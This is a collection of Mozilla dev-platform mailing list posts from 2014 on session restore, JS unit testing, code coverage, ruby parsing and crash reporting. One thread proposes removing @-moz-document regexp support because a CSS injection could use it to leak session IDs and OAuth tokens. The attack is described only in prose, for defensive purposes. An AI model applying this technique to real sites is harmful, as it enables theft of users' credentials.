Unimplement: @-moz-document regexp support?
Summary: Attackers can extract secret URL components (e.g. session IDs, oauth tokens) using @-moz-document. Using the regexp support and assuming a CSS injection (no XSS needed!), the attacker can probe the current URL with some regular expressions and send the URL parameters to a third party. A demo of this exploit can be found at http://html5sec.org/cssession/. This attack has also been published in the academic paper Scriptless Attacks: Stealing the pie without touching the sill[1] by Mario Heiderich et al. and numerous other presentations on this topic [2,3]. My suggestion is to either kill -moz-document for public web content or remove regexp support. What do you think? Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=1035091 Spec: n/a. This was pushed out of CSS3 and did not make it to CSS4 selectors. MDN: https://developer.mozilla.org/en-US/docs/Web/CSS/@document Target release: ?? Platform coverage: desktop, android [1] http://www.nds.rub.de/research/publications/scriptless-attacks/ [2] http://www.slideshare.net/x00mario/stealing-the-pie [3] https://speakerdeck.com/mikewest/xss-no-the-other-s-cssconf-eu-2013 ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Improving Session Restore Experience (was Re: Reordering opened windows)
(Cc-ing Philipp Sackl, for UX feedback.) At the moment, the simplified algorithm is the following: 1. Read sessionstore.js; 2. Open first window; 3. Synchronously, for each window in sessionstore.js, in the order in which the windows have been opened initially, trigger window opening; (Whenever a window is opened, restore its contents.) Drawbacks: * all windows are racing for CPU, DOM, http cache, etc. which makes startup jank and pretty much ensures that Firefox becomes usable only once all windows have finished loading; * weird on-screen activity during startup, with all these windows showing up in an apparently arbitrary order, whether in front or in the back. Ideally, I would like to change it as follows: 1. Read sessionstore.js; 2. Open first window; 3. Open the window most likely to be used immediately (i.e. the most recently used window); 4. Asynchronously, once that window is restored, open in the background the second window most likely to be used immediately; 5. etc. (Whenever a window is opened, restore its contents.) With this scheme, I believe that there are good chances that the user will be presented with the right window immediately, that the window will be usable faster and that the loading of other windows will take place in the background, without distracting visual effects. However, we cannot do this as changing the order in which windows are opened also changes their order in the Windows taskbar and, possibly, their order in MacOS X desktops. Now, you are right, we can probably do as follows: 1. Read sessionstore.js; 2. Open first window; 3. For each window in sessionstore.js, in the order in which the windows have been opened initially, trigger window opening (hidden); 4. Once we have opened the window that should appear first, make it visible, restore its contents; 5. Asynchronously, once that window is restored and the second window has been opened, make it visible and restore its contents; 6. etc. A bit more complicated, but it should provide almost the same result. Cheers, David On 06/07/14 11:08, Neil wrote: David Rajchenbach-Teller wrote: We are considering redesigning slightly how windows are reopened by Session Restore, to ensure that most recently used windows are loaded first. I can't quite tell from your phrasing whether the bottleneck here is the time it takes to open windows. I'm assuming it is, and that Session Restore has to wait for all the windows to open so that it can prioritise loading the most recent window first. Since Session Restore already knows things such as the size and position of the window it wants to restore, I'm wondering whether it might it be possible to open the windows to about:blank and then start loading browser.xul in the most recent window first. (Obviously this only helps if there are three or more windows to restore, since you have to have loaded browser.xul in the first window to know you want to restore the previous session.) -- David Rajchenbach-Teller, PhD Performance Team, Mozilla signature.asc Description: OpenPGP digital signature ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Improving Session Restore Experience (was Re: Reordering opened windows)
Seems to me there are advantages to the more complicated version anyway. Whilst it is reasonable to load the contents of the window they are likely to use first, I'm not sure it follows that you can avoid displaying the other windows until the first is finished loading. I imagine users could be unhappy if it takes a significant amount of time before some of their windows even appear. The thought process could go where has my other window gone?! Oh no, did session restore not save it?!... Oh wait, there it is. phew. Perhaps the other windows could be created and displayed with a Loading contents, please wait. message, that way, if we have a really slow and complicated session to restore, the user isn't left lacking any clue as to whether they are getting all their windows back. Of course, this assumes creating and displaying the windows isn't the costly part. On Monday, July 7, 2014 11:43:50 AM UTC+1, David Rajchenbach-Teller wrote: Now, you are right, we can probably do as follows: 1. Read sessionstore.js; 2. Open first window; 3. For each window in sessionstore.js, in the order in which the windows have been opened initially, trigger window opening (hidden); 4. Once we have opened the window that should appear first, make it visible, restore its contents; 5. Asynchronously, once that window is restored and the second window has been opened, make it visible and restore its contents; 6. etc. A bit more complicated, but it should provide almost the same result. ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Reordering opened windows
On 2014-07-04, 7:38 AM, David Rajchenbach-Teller wrote: Hi, We are considering redesigning slightly how windows are reopened by Session Restore, to ensure that most recently used windows are loaded first. I believe that, in many cases, this would enable users to start browsing faster. Do we have data on how many users have multiple windows? I expect that we have very few such users, but data will carry the day. I'm mostly asking out of interest, because even if we have few multiple window users, those users probably have lots of tabs. That's a good proxy for being a power user, and likely one who cares about restore responsiveness. Nick ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Unit testing internal JS
We have no unit test framework for internal JS, does anyone have any interesting ideas on how to accomplish this with our existing testing frameworks? Should I just leave unit testing functions in the JS file, so they can be run manually during future development? ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Unit testing internal JS
On 07/07/14 09:25, gkee...@mozilla.com wrote: We have no unit test framework for internal JS, does anyone have any interesting ideas on how to accomplish this with our existing testing frameworks? I've successfully used mochitest with specialpowers to access the internal interfaces. xpcshell should work too. ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Try-based code coverage results
Hey Joshua, That's awesome! How long does the try run take that generated this data? We should consider scheduling a periodic job to collect this data and track it over time. Jonathan On 7/6/2014 10:02 PM, Joshua Cranmer wrote: I don't know how many people follow code-coverage updates in general, but I've produced relatively up-to-date code coverage results based on http://hg.mozilla.org/mozilla-central/rev/81691a55e60f, and they may be found here: http://www.tjhsst.edu/~jcranmer/m-ccov/. In contrast to earlier versions of my work, you can actually explore the coverage as delineated by specific tests, as identified by their TBPL identifier. Christian's persistent requests for me to limit the depth of the treemap view are still unresolved, because, well, at 2 AM in the morning, I just wanted to push a version that worked. The test data was generated by pushing modified configs to try and using blobber features to grab the resulting coverage data. Only Linux32/64 is used, and only opt builds are represented (it's a --disable-optimize --disable-debug kind of build), the latter because I wanted to push a version out tonight and the debug .gcda tarballs are taking way too long to finish downloading. Effectively, only xpcshell tests, and the M, M-e10s, and R groups are represented in the output data. M-e10s is slightly borked: only M-e10s(1) [I think] is shown, because, well, treeherder didn't distinguish between the five of them. A similar problem with the debug M(dt1/dt2/dt3) test suites will arise when I incorporate that data. C++ unit tests are not present because blobber doesn't run on C++ unit tests for some reason, and Jit-tests, jetpack tests, and Marionette tests await me hooking in the upload scripts to those testsuites (and Jit-tests would suffer a similar numbering problems). The individual testsuites within M-oth may be mislabeled because I can't sort names properly. There's a final, separate issue with treeherder not recording the blobber upload artifacts for a few of the runs (e.g., Linux32 opt X), even though it finished without errors and tbpl records those artifacts. So coverage data is missing for the affected run. It's also worth noting that a few test runs are mired with timeouts and excessive failures, the worst culprit being Linux32 debug where half the testsuites either had some failures or buildbot timeouts (and no data at all). If you want the underlying raw data (the .info files I prepare from every individual run's info), I can provide that on request, but the data is rather large (~2.5G uncompressed). In short: * I have up-to-date code-coverage on Linux 32-bit and Linux 64-bit. Opt is up right now; debug will be uploaded hopefully within 24 hours. * Per-test [TBPL run] level of detail is visible. * Treeherder seems to be having a bit of an ontology issue... ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Intent to implement and ship: Improved ruby parsing in HTML with new tag omission rules
On Tuesday, July 1, 2014 12:58:45 PM UTC-7, Koji Ishii wrote: Summary: Two recent HTML changes improve ruby support: 1) Addition of the rb and rtc elements (but not rbc); and 2) Matching update to the tag omission rules to make ruby authoring easier. By implementing these changes, Gecko supports the parsing side of all the ruby use cases required for the internationalization of HTML (see use cases document below for details). It also enables the implementation of the CSS Ruby Layout. The Japanese education market strongly requires this and a Mozilla developer has already started working on it. Could you elaborate on why we are using the more complicated W3C rules here instead of the simpler WHATWG rules, given that the WHATWG rules also address the same use cases? See: https://bugzilla.mozilla.org/show_bug.cgi?id=9#c110 -- Ian Hickson ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Try-based code coverage results
On 7/7/2014 11:39 AM, Jonathan Griffin wrote: Hey Joshua, That's awesome! How long does the try run take that generated this data? We should consider scheduling a periodic job to collect this data and track it over time. Well, it depends on how overloaded try is at the moment. ^_^ The builds take an hour themselves, and the longest-running tests on debug builds can run long enough to encroach the hard (?) 2 hour limit for tests. Post-processing of the try data can take another several hours (a large part of which is limited by the time it takes to download ~3.5GB of data). -- Joshua Cranmer Thunderbird and DXR developer Source code archæologist ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Unit testing internal JS
Garvan is referring to JS files that implement XPCOM interfaces. It's impossible to test internal details of the components without exposing them via an interface, which can end up convoluting the code in some cases. Cheers, Josh On 07/07/2014 12:32 PM, Gijs Kruitbosch wrote: On 07/07/2014 17:25, gkee...@mozilla.com wrote: We have no unit test framework for internal JS, does anyone have any interesting ideas on how to accomplish this with our existing testing frameworks? Should I just leave unit testing functions in the JS file, so they can be run manually during future development? I'm not sure what you mean by internal JS. We have xpcshell tests, in which you could load an arbitrary JS file if you wanted, and then run tests against the functions in that file. Or if it's a JSM, you could load that and use the result of Cu.import to do internal tests (as that will produce a BackstagePass which will allow you to interact with non-exported symbols from that JSM). ~ Gijs ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Depending on libnotify
On 7/4/14, 7:46 AM, David Rajchenbach-Teller wrote: Well, we basically have the Windows version implemented already. We could possibly use Watchman for other platforms. How do others feel about introducing a dependency towards Watchman? The inotify limitation on watchers is indeed annoying in the long run, but ok for the kind of applications we have in mind, so that's ok for me. If you don't need the robustness of watchman, why add a dependency for it? It sounds like a one-off low-level interface to inotify (which you've already built?) is sufficient. ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Unit testing internal JS
On 7/7/2014 1:53 PM, Josh Matthews wrote: Garvan is referring to JS files that implement XPCOM interfaces. It's impossible to test internal details of the components without exposing them via an interface, which can end up convoluting the code in some cases. I expect you can import them using Cu.import if you wanted just for testing. You might need to use an unusual import name like resource://gre/components/nsSomething.js. --BDS ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Unit testing internal JS
On 7/7/14, 10:53 AM, Josh Matthews wrote: Garvan is referring to JS files that implement XPCOM interfaces. It's impossible to test internal details of the components without exposing them via an interface, which can end up convoluting the code in some cases. Really? I thought you could Cu.import() a JS file implementing a component and then use the returned backstagepass to inspect unexported symbols. ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Try-based code coverage results
On Mon, Jul 7, 2014 at 11:11 AM, Jonathan Griffin jgrif...@mozilla.com wrote: I guess a related question is, if we could run this periodically on TBPL, what would be the right frequency? We could potentially create a job in buidlbot that would handle the downloading/post-processing, which might be a bit faster than doing it on an external system. Ideally, you would be able to trigger it on a try run for specific test suites or even specific subsets of tests. For example, for certificate verification changes and SSL changes, it would be great for the reviewer to be able to insist on seeing code coverage reports on the try run that preceded the review request, for xpcshell, cppunit, and GTest, without doing coverage for all test suites. To minimize the performance impact of it further, ideally it would be possible to scope the try runs to cppunit, GTest, and xpcshell tests under the security/ directory in the tree. This would make code review more efficient, because the reviewers wouldn't have to spend as much time suggesting missing tests as part of the review. In PSM, and probably in Gecko generally, people are unlikely to write new tests for old code that they are not changing, so periodic full reports would be less helpful than reports for tryserver. Cheers, Brian ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Unimplement: @-moz-document regexp support?
That seems pretty bad. I think we should at least stop supporting it for Web content. David, what do you think? Cheers, Ehsan On 2014-07-07, 4:56 AM, Frederik Braun wrote: Summary: Attackers can extract secret URL components (e.g. session IDs, oauth tokens) using @-moz-document. Using the regexp support and assuming a CSS injection (no XSS needed!), the attacker can probe the current URL with some regular expressions and send the URL parameters to a third party. A demo of this exploit can be found at http://html5sec.org/cssession/. This attack has also been published in the academic paper Scriptless Attacks: Stealing the pie without touching the sill[1] by Mario Heiderich et al. and numerous other presentations on this topic [2,3]. My suggestion is to either kill -moz-document for public web content or remove regexp support. What do you think? Bug: https://bugzilla.mozilla.org/show_bug.cgi?id=1035091 Spec: n/a. This was pushed out of CSS3 and did not make it to CSS4 selectors. MDN: https://developer.mozilla.org/en-US/docs/Web/CSS/@document Target release: ?? Platform coverage: desktop, android [1] http://www.nds.rub.de/research/publications/scriptless-attacks/ [2] http://www.slideshare.net/x00mario/stealing-the-pie [3] https://speakerdeck.com/mikewest/xss-no-the-other-s-cssconf-eu-2013 ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Rethinking the crash experience
We should keep in mind that sometimes due to startup crashes, we don't get to run any of the code in Firefox, so we can't gate the crash report submission on that code at least in the case of startup crashes. Cheers, Ehsan On 2014-07-05, 8:21 AM, David Rajchenbach-Teller wrote: I haven't experienced crashes in some time, so I may have missed some redesigns, but last time I did, the crash experience looked as follows: 1. Something goes wrong in the code of Firefox; 2. Firefox dies; 3. Crash Reporter appears; 4. Eventually, if the user has clicked restart, Firefox restarts. Point 3. strikes me as rubbing the nose of the user in the problem we encountered, as well as possibly counter-productive if the crash takes place during shutdown. Could we redesign this as follows? 1. Something goes wrong in the code of Firefox; 2. Firefox dies; 3. Crash report is stored to disk, without any dialog; 4. If the crash happened during Firefox shutdown, do nothing, otherwise restart Firefox to its previous state (obviously, we need some measure to prevent this from looping); 5. Upon the next restart, display a bottom doorhanger on all windows Firefox or an add-on encountered a problem [a few seconds ago / on July 4rd, 2014] and recovered. If you wish, Firefox can report it automatically so that we can fix the bug report/not this time/always report/never report. My apologies if this is part of the ongoing CrashManager work. Cheers, David ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Rethinking the crash experience
On 07/07/14 21:21, Ehsan Akhgari wrote: We should keep in mind that sometimes due to startup crashes, we don't get to run any of the code in Firefox, so we can't gate the crash report submission on that code at least in the case of startup crashes. Cheers, Ehsan Yes, we clearly need to keep the behavior as a fallback, in case of startup or near-startup crash. Cheers, David -- David Rajchenbach-Teller, PhD Performance Team, Mozilla signature.asc Description: OpenPGP digital signature ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Try-based code coverage results
On 7/7/2014 1:11 PM, Jonathan Griffin wrote: I guess a related question is, if we could run this periodically on TBPL, what would be the right frequency? Several years ago, I did a project where I ran code-coverage on roughly every nightly build of Thunderbird [1] (and I still have those results!). When I talked about this issue back then, people seemed to think that weekly was a good metric. I think Christian Holler was doing builds roughly monthly a few years ago based on an earlier version of my code-coverage-on-try technique until those builds fell apart [2]. [1] Brief aside: if you thought building mozilla code was hard, try building Mozilla code from two years ago (I was building 2008-era code in 2010)... [2] I used to dump the code coverage data to stdout and have scripts to extract them from the tbpl logs. That stopped working when mochitest-1 logs grew way too long, and it wasn't until blobber was up and running that anyone re-attempted the project. -- Joshua Cranmer Thunderbird and DXR developer Source code archæologist ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Try-based code coverage results
Filed https://bugzilla.mozilla.org/show_bug.cgi?id=1035464 for those that would like to follow along. Jonathan On 7/7/2014 3:22 PM, Jonathan Griffin wrote: So it sounds like it would be valuable to add try syntax to trigger this, as well as produce periodic reports. Most of the work needed is the same. I'll file a bug to track this; I don't have an ETA for starting work on it, but we want to get to it before things bitrot. Jonathan On 7/7/2014 12:49 PM, Joshua Cranmer wrote: On 7/7/2014 1:11 PM, Jonathan Griffin wrote: I guess a related question is, if we could run this periodically on TBPL, what would be the right frequency? Several years ago, I did a project where I ran code-coverage on roughly every nightly build of Thunderbird [1] (and I still have those results!). When I talked about this issue back then, people seemed to think that weekly was a good metric. I think Christian Holler was doing builds roughly monthly a few years ago based on an earlier version of my code-coverage-on-try technique until those builds fell apart [2]. On 7/7/2014 11:18 AM, Brian Smith wrote: Ideally, you would be able to trigger it on a try run for specific test suites or even specific subsets of tests. For example, for certificate verification changes and SSL changes, it would be great for the reviewer to be able to insist on seeing code coverage reports on the try run that preceded the review request, for xpcshell, cppunit, and GTest, without doing coverage for all test suites. To minimize the performance impact of it further, ideally it would be possible to scope the try runs to cppunit, GTest, and xpcshell tests under the security/ directory in the tree. ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform
Re: Try-based code coverage results
On 7/7/2014 5:25 PM, Jonathan Griffin wrote: Filed https://bugzilla.mozilla.org/show_bug.cgi?id=1035464 for those that would like to follow along. Perhaps bug 890116 is a better measure of tracking. -- Joshua Cranmer Thunderbird and DXR developer Source code archæologist ___ dev-platform mailing list dev-platform@lists.mozilla.org https://lists.mozilla.org/listinfo/dev-platform